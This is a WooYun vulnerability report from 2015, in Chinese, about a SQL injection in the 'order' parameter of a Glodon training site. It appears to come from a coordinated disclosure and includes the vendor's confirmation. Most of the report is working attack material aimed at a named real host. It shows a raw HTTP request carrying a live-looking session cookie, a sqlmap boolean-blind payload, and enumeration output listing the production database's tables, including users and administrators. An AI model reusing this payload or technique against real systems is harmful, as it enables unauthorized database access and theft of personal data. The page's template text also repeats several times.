广联达某处SQL注入（2库） | wooyun-2015-0163145

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0163145

漏洞标题：

广联达某处SQL注入（2库）

漏洞详情

披露状态：

2015-12-22：细节已通知厂商并且等待厂商处理中
2015-12-22：厂商已经确认，细节仅向厂商公开
2016-01-01：细节向核心白帽子及相关领域专家公开
2016-01-11：细节向普通白帽子公开
2016-01-21：细节向实习白帽子公开
2016-02-04：细节向公众公开

简要描述：

看见厂商说送礼物瞬间有了动力

详细说明：

虽然活动结束了但是用户信息却留下了····

GET /courses?order=*&page=3 HTTP/1.1
X-Forwarded-For: 8.8.8.8'
X-Requested-With: XMLHttpRequest
Referer: http://haosy.glodon.com:80/
Cookie: _rails_ds2015_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTA4MWNkYzQzYzllNDRjNzVjMGI0Y2M4ZjgwYTFiYjdmBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMU9sUkNFVGZ0NXpWUkR4dWtETkIxSlZTVDQyUGhENHRaMTZodGRETjJSQXM9BjsARkkiE3VzZXJfcmV0dXJuX3RvBjsARiIRL2NvdXJzZXMvMjU0--c096628d995d45729926319bff7b8cc0a3068a4e
Host: haosy.glodon.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

参数 order 可注入

Database: ds2015_production
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| score_logs                | 2046715 |
| vote_logs                 | 1421749 |
| fight_papers              | 417146  |
| papers                    | 194765  |
| course_logs               | 53751   |
| exam_specialty_statistics | 39498   |
| users                     | 36065   |
| fight_exams               | 33924   |
| sign_ins                  | 24789   |
| download_logs             | 23317   |
| scores                    | 13116   |
| yyc_statistics            | 12528   |
| game_chances              | 11859   |
| exams                     | 7793    |
| notices                   | 4377    |
| zones                     | 3218    |
| yysz_statistic_details    | 2941    |
| questions                 | 2496    |
| comments                  | 1544    |
| assets                    | 1335    |
| projects                  | 1205    |
| articles                  | 1055    |
| videos                    | 679     |
| administrator_affiliates  | 553     |
| courses                   | 306     |
| permission_events         | 88      |
| events                    | 83      |
| administrators            | 73      |
| administrator_permissions | 64      |
| award_records             | 63      |
| sessions                  | 41      |
| affiliates                | 40      |
| awards                    | 39      |
| question_files            | 26      |
| chapters                  | 11      |
| official_materials        | 10      |
| areas                     | 7       |
| games                     | 4       |
| permissions               | 3       |
| announcements             | 2       |
| youku_tokens              | 1       |
+---------------------------+---------+
[13:52:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2366 times, 502 (Bad Gateway) - 31 times
[13:52:28] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\haosy.glodon.com'
[*] shutting down at 13:52:28

漏洞证明：

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection point(s) with a total of 41 HTTP(s) re
quests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://haosy.glodon.com:80/courses?order=(SELECT (CASE WHEN (4871=4
871) THEN 4871 ELSE 4871*(SELECT 4871 FROM INFORMATION_SCHEMA.CHARACTER_SETS) EN
D))&page=3
---
[13:16:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:16:22] [INFO] fetching database names
[13:16:22] [INFO] fetching number of databases
[13:16:22] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[13:16:22] [INFO] retrieved: 2
[13:16:26] [INFO] retrieved:
[13:16:30] [INFO] heuristics detected web page charset 'ascii'
information_schema
[13:17:50] [INFO] retrieved: ds2015_production
available databases [2]:
[*] ds2015_production
[*] information_schema
[13:19:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 162 times, 502 (Bad Gateway) - 1 times
[13:19:25] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\haosy.glodon.com'
[*] shutting down at 13:19:25

修复方案：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-12-22 14:31

厂商回复：

我们正在处理中，感谢提交的漏洞。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云